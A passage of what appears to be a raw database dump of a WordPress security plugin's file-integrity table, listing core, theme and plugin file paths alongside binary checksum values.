i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('���J3zI�A���','wp-content/themes/doctors/core/contents/part_header/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�4w��v$&-��� �','3j�B6�����Ժ�����.6&�9X\'dAY','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',0,'���%fX٨�=TQ!','���%fX٨�=TQ!','rb�P�Z���#�Ue�xBS�6F셥Կ\\?�','',0,'?'),('�$o+�Е�T�pr\ny','wp-content/themes/regina-lite/inc/customizer/panels/blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�+D�V;�,��','Aa���.1Er�xז^m悵G�1U߸+�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�>7k�Dm���=��','wp-content/themes/doctors/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�PDo�6]|�.��;�','���<\Z\'@Xa�s�ЮP?@�qt�F��qm�E�\Z','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('�`(G��P�o����t','wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/img/macho-themes-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��4�\Z�x�N���','����V�ͯu��#�n����T\Z��^é�','',0,'?'),('�g8ڌ���\r9\Z���Y','wp-content/themes/regina-lite/layout/css/pace.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�/���^���~�\n&','hV�T�N�sT�^�͵8�\'u8T��0w�M�','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('�����}��U;Pq�\ZQ','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-code.php',0,'3�����C~�]=?�','3�����C~�]=?�','��Hu�r�S��!�㒦\r�r��E��b����','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC� �','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9�䩠�\"�\0m���','�/} ��� ��ԾA9{�!���w���a��.','',0,'?'),('�����oy�\\Y.6�','wp-content/plugins/disable-gutenberg/inc/plugin-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\Z3w�|��;�:� L','���<|r���j��(��K^\\P��','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K�� � ','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3� �z͟��ӱ�','',0,'?'),('�œ���i����ҥ�','wp-content/themes/wp-barrister/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ŋ�4.bSF��FD��N','&� QŰXG����c���ν�A�A�i�I��','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�1뢇�:�HB�g撚r','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��Ru�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('��yM�e�_���','wp-content/themes/doctors/core/contents/loop_frontPage/frontPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ol~돹��L�?','�¾�~Z!�t�p\'K/_���y�yXh�����U','',0,'?'),('����E��_�؟kV��','wp-content/themes/regina-lite/layout/css/owl-carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԟ��DN|g��z™�','x,��2y��g�q�~���^i���MD.#%','',0,'?'),('��H��x���� ���','wp-content/themes/regina-lite/page-templates/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s4m,�k��5�x���','�Y�E��?�߷��JY�W���q!k)<H�y�6�','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('� ϛ��3Rc��Ϲ','wp-content/plugins/redirection/fileio/csv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0C�CW&�Q� ~�','����3�$��RE����5�Nt �s��-h','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�21����b���m� ','H���>���@+��q�j(~�]�v`�즃�\'','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?� p�f\0qO��_���&N9','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;��h� $��z\n�U','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php',0,'�\Z�1\n���_�K����t','�\Z�1\n���_�K����t','D��慔�H�-���=`�u�~ ��dh�|�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$�� ��↜������Sk��ik�','',0,'?'),('�MK���ڊ$��\'7�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/layouts/layouts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?-�vVmݮ��G4v�','\r���S.�Bz��?��I��뙂�\Z�R-7a��g�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!a���� ��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,�yS�h�K=�c','9|Wü��yt�ϝ���]P,is�Ǯ���S7F���','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rb��q\"�]�+\\','��m>� ��ӵ㿞í��\ZC��(8��(','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('��tb�|��{�q','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hq��A����i�','��� q68�xօ�\\��s\rN�~�.��Zخ[\"','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�L��$�~ZvV��','�\"��꯹�bG�����|���E���L�ٟ,','',0,'?'),('�ŕ��B^u?���3','wp-admin/images/about-color-palette.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���i�h\n�[v���','\Z�AS��[�[��kn/�:�%��>\Z\'��_','',0,'?'),('���\n̶��1���6��9','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-���<:�ʹy','�31�1�.�K��>�2d%>�E�y���','',0,'?'),('��MFR?�yCA/�jN','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q����[ ��7�ܟ','x,��2y��g�q�~���^i���MD.#%','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�~<B^��k���','v-��a�F\\C�0��7C�����=VlԺ�','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8� �����:{��W��e','6{w���^Gk�Ϋ�25�b��\r���','',0,'?'),('�\\+��*\0�>�G�]l@�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/epsilon-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���+�`�_� z+',' �Z��6�LM�6l�I;UHME,�����[�','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('�\nad��z����ŝ<j','wp-content/themes/advance/inc/kirki/assets/js/controls/radio.js',0,'�Jw�[N��P���','�Jw�[N��P���','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ� ����p�k��)����!\r��','',0,'?'),('����|���xY�iF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߔ>�j7\'\r\0��','���K\ns�DШ�D}�\0b�x:�XJ�HlN~��k','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('���~�� �6w=�','wp-content/themes/healing-touch/blog-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��8�,u��dS=��','�H����8����)�\ZV�r ��eI�h��8��','',0,'?'),('����y�T4�!��K\n','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php',0,'��ol���;�tNy�>g','��ol���;�tNy�>g','��d���}��;�9T���$��\'tEj�(]','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��H�G4#��Op��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/repeater/repeater-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�\n�6��L��[���','\rZt�Li�\ZVvj�ꣽڇ�\'��Y�<���� z','',0,'?'),('��E���Q?�� (�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('����#���*�U','wp-content/themes/regina-lite/inc/customizer/assets/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�%��<IA24�]�:|6 ','wp-content/themes/healing-touch/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� .��ݺ��]���','��!)�_�?`�u`�F�!��:�9M,�Z8�\n','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��^Z\"^�v�\r','�\r�w�^���攗\n-�_l��<��\"���4W�X','',0,'?'),('�7e����X�x���N','wp-content/themes/healing-touch/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rب��o�0XA�ٙ�','�J�0��P��-[s�:!���&:^qT(��','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('�O�Y��v)�=gݝ�Zo','wp-content/themes/healthcare/comment-function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>p�G����?�','���+�0^��\ri�̹��0F�_/ٸ��^w\r','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj��z7=���','����g��%��R�C�R}<�0�]�uɬK','',0,'?'),('��f4*�a�����k$','wp-content/themes/regina-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!& �2�rx �ٱ�',')�C�b�(bMe��ȓ������M���{g','',0,'?'),('��`$Ϯ���O�\0i','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�В��o�a�\"��','l @> �8[w�t����?X扊�>��V}�','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('���K���\'�\Zxrx��','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y� ���,�W��\Z�^','Zv�MYWH��k��I=��\Z�Qj�E�ǟ�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w�� ���','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q����-ڠ�t�56�',',C=ē0ȸ�a&�\"WӸ��Ă��0\n�(�73x','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�E���F��Q�-5�','wp-content/plugins/redirection/locale/redirection-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���&�����F','�1�z�x��~�L<�Ġ��>\ZÉ G.ʸ�','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�jp&�\"(8(��2�e','wp-content/themes/vision-lite/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('�x˅֛%���Mu�n�','wp-content/themes/doctors/images/demo/bg_3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �ސi?�:%k','�G-X���ȷ�m`�O��\0i����YK�','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\'�@>@������','��o���m�z�Jr;P���%��ːdUS3��>','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�p��=r���8ʗ�','�\\��Z���`\\@��*�Ǘ�o3B�&j\0','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���
�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('���:�[�f��KZ�?�','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�N���.���,','r�ŃM\n�.�H���D�3w�m�yb���','',0,'?'),('���(_�J�D~���','wp-content/themes/twentynineteen/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�j%mx�t�h��','��m�ۄ�({�V�3�R�#/.pBց\')r@��','',0,'?'),('�����T���nJ��','wp-content/themes/advance/inc/kirki/assets/js/controls/dashicons.js',0,'��(c�S��ɹ>��g','��(c�S��ɹ>��g','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�.����$9b�5�ޝ','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�[1+��㴗��Θ�<','��b�i������~��?<@_c����8K�','',0,'?'),('�Q.�,PY���YN�','wp-content/themes/advance/footer/part-footer1.php',0,'��B?�L�����9�','��B?�L�����9�','��&��Lr���@�U\r����R���2+żq','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�I�-���CԎ9�H8k','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/minicolors/jquery.minicolors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r���]ZH���','D�>`_�x�2��Y�sű<��P{���\0�s','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('�������`\"&`wi~','wp-content/themes/doctors/core/includes/trunk/ds1/ds1_home-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�*W/r�2��+�T','�I�VW�^82�Ǽ��%p��a���oK�','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Th�;��ͯ�|!fE�\"\n','��(��o{il�A��� \'�Z�E�I�d/&�','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!jz�F#�����d�ĚMP','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����:�ԕw$ބ�j','�a���95�]��ꐺW�e+,�O��� &�u','',0,'?'),('������,|༫��Nc','wp-content/themes/healthcare/images/Pinterest-Feed-Pro-WordPress-Plugin.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SI b��0��d?q�t�C','���9I��pm�ϟ&\r��I��cqL� �Q��','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�~yEfF��d�x��','O�tJʰ�Z伡��V�S<ͤw�z1W�~>��0)','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('�}��%c�<���b','wp-content/themes/healing-touch/images/icon4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3$I�͆LQx���%�','������3@�E�u��xM~�p������Z','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 